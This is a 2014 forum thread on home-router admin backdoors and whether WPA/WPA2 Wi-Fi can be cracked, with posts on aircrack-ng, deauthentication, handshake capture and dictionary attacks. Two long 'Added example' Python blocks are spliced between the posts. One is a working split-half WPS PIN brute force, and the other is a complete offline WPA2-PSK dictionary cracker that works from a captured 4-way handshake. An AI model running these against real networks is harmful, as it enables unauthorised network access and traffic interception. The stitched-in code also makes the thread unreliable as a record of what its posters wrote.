
Another router backdoor found!

Discussion in 'Networking & Security' started by remixedcat, Jan 3, 2014.

  1. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    Gaping admin access holes found in SoHo routers from Linksys, Netgear and others


    Read more here:
    http://nakedsecurity.sophos.com/201...soho-routers-from-linksys-netgear-and-others/

    List of affected routers:
    http://wikidevi.com/w/index.php?tit...Global+type::~embedded*]]&p=format=broadtable
     
    Aquinus and Frick say thanks.
  2. newtekie1

    newtekie1 Semi-Retired Folder

    Joined:
    Nov 22, 2005
    Messages:
    22,871 (5.86/day)
    Thanks Received:
    8,824
    I think people are making larger deals out of both of these exploits. They aren't possible from outside of the network, which means you have to let the person on your network before they can exploit them. You should trust the people you let on your network anyway. But even if you do let shady people on your wireless, what is the most they can do by getting access to your router's config page? Reset it to factory defaults, maybe get your wireless key (which they probably already have since you let them on your network)? There isn't much harm that can be done by getting access to the router config; they are already on your network, there are far worse things they could already be doing. You yourself have already made a huge breach in security by allowing them on your network in the first place.
     
    newconroer says thanks.
  3. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    Sometimes, going to the WAN IP, you can access the router's config page. Depends, really.
     
  4. newtekie1

    newtekie1 Semi-Retired Folder

    Joined:
    Nov 22, 2005
    Messages:
    22,871 (5.86/day)
    Thanks Received:
    8,824
    In the case of Joel's backdoor that might be possible, but the user of the router would have to enable remote access, which is another major security risk (since it opens you up to a brute force). And I don't know of any SOHO router that comes with this option enabled by default.

    This latest exploit however seems like it has to be exploited from the inside since the listening service that is used by the exploit only listens on the wireless interface.
     
  5. silentbogo

    silentbogo

    Joined:
    Nov 20, 2013
    Messages:
    1,224 (1.25/day)
    Thanks Received:
    1,254
    Location:
    Dark and creepy attic
    You don't have to be trusted by the owner to gain access to the wireless network from the outside.
    With tools like aircrack-ng and similar you can get access to any WPA(2)/WEP protected network given enough time and effort.
    The potential security risks are enormous: you could monitor traffic, redirect it the way you want, even change the firmware of the router without the knowledge of the owner (how often do you check the router's settings, if everything works the way it's supposed to?).
     
  6. brandonwh64

    brandonwh64 Addicted to Bacon and StarCrunches!!!

    Joined:
    Sep 6, 2009
    Messages:
    19,283 (7.66/day)
    Thanks Received:
    6,744
    Location:
    Chatsworth, GA
    Yeah, these routers have a new feature where you can sign up at Linksys or Cisco's website and it allows you to configure your router from the internet, kinda like a domain for your home network. I played with one the other day and that was the first thing I disabled for the customer.
     
  7. scoutingwraith

    scoutingwraith

    Joined:
    Jun 3, 2007
    Messages:
    726 (0.22/day)
    Thanks Received:
    60
    Hmm. I am a bit lost in this but will this exploit apply to DD-WRT firmware i have installed on my Belkin Router?
     
  8. newtekie1

    newtekie1 Semi-Retired Folder

    Joined:
    Nov 22, 2005
    Messages:
    22,871 (5.86/day)
    Thanks Received:
    8,824
    WEP is pretty easy to crack, but no one should be using that anyway. However, it is no trivial matter to crack WPA(2); the primary cracking tools for WPA actually exploit an issue with WPS (which again you should have turned off), they don't actually crack WPA.

    But again, once they have access to your network, there are far worse things they can do than hack your router and change some settings.

    I'm in my router viewing the settings pretty much weekly.

    No, the open source firmware shouldn't be affected by this.
     
    Last edited: Jan 11, 2014
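Added example (not code from the thread or from any of the tools named in it) of the WPS issue newtekie1 refers to. The 8-digit WPS PIN carries a checksum digit, and the registrar in the AP acknowledges the first four digits (at message M4) before it ever checks the last four, so an online guess needs at most 10^4 + 10^3 attempts instead of 10^7. The access point below is a constructed stand-in that only models that per-half response; the secret PINs are made up.

```python
# Added example: WPS PIN checksum and the split-half online brute force.
# FakeRegistrar is a constructed model of an AP, not a real WPS implementation.


def wps_checksum(first7: str) -> int:
    """Checksum digit over the first seven PIN digits (weights 3,1,3,1,3,1,3)."""
    acc = 0
    for i, ch in enumerate(first7):
        acc += 3 * int(ch) if i % 2 == 0 else int(ch)
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """A PIN is well formed when its eighth digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class FakeRegistrar:
    """Constructed AP model: leaks exactly what the protocol leaks, one half at a time."""

    def __init__(self, secret_pin: str):
        assert is_valid_pin(secret_pin)
        self.secret = secret_pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        """'M4-fail' if the first half is wrong, 'M6-fail' if the second half is wrong, else 'ok'."""
        self.attempts += 1
        if pin[:4] != self.secret[:4]:
            return "M4-fail"
        if pin[4:] != self.secret[4:]:
            return "M6-fail"
        return "ok"


def brute_force_pin(ap: FakeRegistrar):
    """Fix the first half from the M4 response, then search the three free digits of the second."""
    first = None
    for i in range(10_000):
        # the second half is irrelevant until the first half is accepted
        if ap.try_pin(f"{i:04d}0000") != "M4-fail":
            first = f"{i:04d}"
            break
    if first is None:
        return None
    for j in range(1_000):
        second = f"{j:03d}"
        pin = first + second + str(wps_checksum(first + second))
        if ap.try_pin(pin) == "ok":
            return pin
    return None


def worst_case_attempts() -> int:
    """Upper bound on guesses for the split search: 10^4 first halves + 10^3 second halves."""
    return 10_000 + 1_000


if __name__ == "__main__":
    ap = FakeRegistrar("12345670")  # constructed secret PIN
    print("recovered:", brute_force_pin(ap), "after", ap.attempts, "attempts")
    print("worst case:", worst_case_attempts(), "vs", 10**7, "with no half-by-half feedback")
```

The loop count is the whole point: a PIN space that would take ten million tries if the AP answered only yes/no to the full PIN collapses to eleven thousand because the AP answers for each half separately.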
  9. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    Please give us a cite that shows where WPA2 authentication with AES encryption using 8+ character non-dictionary passphrase has been cracked.
    Otherwise, "enough time" means centuries, if not millennia.
     
  10. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    Even Fluke Networks has a video how to crack wifi networks.
     
  11. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    Fluke has over 200 videos posted on youtube... that's hardly a cite.
     
  12. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
     
  13. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    That's not a crack; that's a deauthentication attack.
    That's the equivalent of saying a Distributed Denial of Service attack is breaking into someone's computer.
    Or that squirting all their locks full of epoxy will let you steal someone's car.

    Running deauth attacks is just being a twit. I've got a 3 pound engineer's hammer I'd use on whoever's computer running those I tracked down with my TechnoLab mini-yagi... :)
     
    Last edited: Jan 15, 2014
  14. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    Well, you can use it to get keys and stuff; it's part of the process, though. There are several ways to get the keys and this is one of them.
     
  15. silentbogo

    silentbogo

    Joined:
    Nov 20, 2013
    Messages:
    1,224 (1.25/day)
    Thanks Received:
    1,254
    Location:
    Dark and creepy attic
    Once you've captured the 4-way handshake, you have a source to recover the WPA2 password.
    WPS not involved, no sledgehammer needed.
    There is a better video showing how to hack a WPA2 network using this method:

    The only thing that's necessary at this point is a decent set of dictionaries.

    I performed the same procedure on my test network, which was protected by an 11-character password (asked my cousin to set one up, to be fair), and it worked with a 2GB+ dictionary.
    The only limitation of this hacking technique is that it is viable only for dictionary cracking or small passwords, so if you are using a 13(+)-symbol randomly generated mixed-case alphanumerical passphrase with special chars, you are relatively safe. Other than that, there are hundreds of different configurations of password libraries online, which have existed since the time people were cracking zip archives. I still have a CD with a translit and keyboard-layout based dictionary for Russian passwords lying around somewhere.
    Another thing that should be taken into account is GPU processing.
    http://www.scmagazineuk.com/wifi-is-no-longer-a-viable-secure-connection/article/119294/
    If such a thing was possible in 2008, think what you can do with a modern GPU with 5 to 10 times as many shader processors and a lot more computing power.
     
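Added example (not from the thread, and not aircrack-ng's code) of what the offline attack silentbogo describes actually computes once the 4-way handshake is on disk. For each candidate passphrase: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); PTK = PRF-512 over the two MAC addresses and the two nonces; KCK = first 16 bytes of the PTK; MIC = HMAC-SHA1(KCK, EAPOL message 2 with its MIC field zeroed), truncated to 16 bytes. If the recomputed MIC equals the captured one, the candidate is the PSK. The SSID, MACs, nonces, RSN IE and wordlist below are constructed; `capture_handshake` stands in for the capture tool and builds the message-2 frame that a real sniffer would hand you.

```python
import hashlib
import hmac
import struct

# Added example: offline WPA2-PSK dictionary attack against a captured 4-way handshake.
# Every handshake value here is constructed for the demo, not taken from a real network.

MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields preceding the 16-byte MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(pmk, label || 0x00 || data || counter) for counter 0..3."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for counter in range(4):
        msg = b"Pairwise key expansion\x00" + data + bytes([counter])
        out += hmac.new(pmk, msg, hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (CCMP): HMAC-SHA1 over the frame with the MIC zeroed, first 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes, key_data: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (supplicant -> AP) with the given MIC written in."""
    body = (
        bytes([0x02])                                # descriptor type: RSN
        + struct.pack(">H", 0x010A)                  # key info: version 2, pairwise, MIC bit set
        + struct.pack(">H", 0)                       # key length
        + struct.pack(">Q", 1)                       # replay counter
        + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, key IV, RSC, key ID
        + mic
        + struct.pack(">H", len(key_data)) + key_data
    )
    return bytes([0x02, 0x03]) + struct.pack(">H", len(body)) + body  # EAPOL v2, type Key


def capture_handshake(ssid, passphrase, aa, spa, anonce, snonce, key_data) -> dict:
    """Stand-in for the sniffer: yields the same fields a real capture would."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    unsigned = build_msg2(snonce, bytes(16), key_data)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": build_msg2(snonce, eapol_mic(kck, unsigned), key_data)}


def check_passphrase(hs: dict, candidate: str) -> bool:
    """Recompute the message-2 MIC under a candidate passphrase and compare with the capture."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    captured = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured)


def crack_wpa2(hs: dict, wordlist):
    """Dictionary attack: first candidate whose MIC matches is the PSK; None if it is not listed."""
    for word in wordlist:
        if check_passphrase(hs, word):
            return word
    return None


# Constructed inputs for the demo.
SSID = "TPU-test"
AA = bytes.fromhex("001122334455")      # AP BSSID
SPA = bytes.fromhex("66778899aabb")     # client MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
WORDLIST = ["letmein", "qwerty123", "password123", "tpuforums"]

WEAK = capture_handshake(SSID, "password123", AA, SPA, ANONCE, SNONCE, RSN_IE)
STRONG = capture_handshake(SSID, "k7#Qm2!vRz9$pL", AA, SPA, ANONCE, SNONCE, RSN_IE)

if __name__ == "__main__":
    print("weak network:", crack_wpa2(WEAK, WORDLIST))
    print("strong network:", crack_wpa2(STRONG, WORDLIST))
```

The 4096-round PBKDF2 per candidate is the whole cost of the attack, which is why the wordlist quality and the GPU mentioned in the post matter: nothing about the handshake itself is broken, the attacker is just allowed unlimited offline guesses against it. The second handshake, whose passphrase is a random 14-character string, comes back as not found against the same list.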
  16. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    It's hard to get a lower priced laptop that has a decent GPU to do that processing though.
     
  17. silentbogo

    silentbogo

    Joined:
    Nov 20, 2013
    Messages:
    1,224 (1.25/day)
    Thanks Received:
    1,254
    Location:
    Dark and creepy attic
    You only need a laptop to capture the handshake. Processing could be done at home.
     
  18. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    Except my spec was,
    "Please give us a cite that shows where WPA2 authentication with AES encryption using 8+ character non-dictionary passphrase has been cracked."

    Personally, I use the MD5 hash of the SHA1 hash of a non-dictionary word for a passphrase.
    e.g.
    P1a2s3s4W5o6r7d
    SHA1 = b30272e2a576f1d081ac4a4beb123bec5080ad31
    MD5 (of SHA1 hash) = 4141de03e086dcf354135800d8c5973e
    The only time it's a hassle is when you're associating a device with only an onscreen keyboard (instead of being able to copy+paste from the hash generator directly into wlassistant in linux distros, or WZC interface in windows).
    Good luck building a dictionary for that.

    I have my doubts about aircrack being able to reverse engineer those vectors even if 5 or more dictionary words are strung together with, say, the last letter of each word capitalized, either. e.g. thiS'SAsimplEyeTmostlYsecurEpassphrasE

    I think all the apps run in that video are in the fedora security lab (FSL) spin, by the way:
    32-bit - http://torrent.fedoraproject.org/torrents/Fedora-Live-Security-i686-20.torrent
    64-bit - http://torrent.fedoraproject.org/torrents/Fedora-Live-Security-x86_64-20.torrent
     
  19. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    Since you know soooo muuuch about this you must know of a tool better than aircrack-ng???
     
  20. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
    What's your budget?
     
  21. remixedcat

    remixedcat

    Joined:
    May 13, 2010
    Messages:
    4,024 (1.78/day)
    Thanks Received:
    1,253
    ummmmm like 20 dollars at most right now
     
    Arjai says thanks.
  22. Darr247

    Darr247 New Member

    Joined:
    Jan 15, 2014
    Messages:
    15 (0.02/day)
    Thanks Received:
    3
    Location:
    Onondaga MI - USA
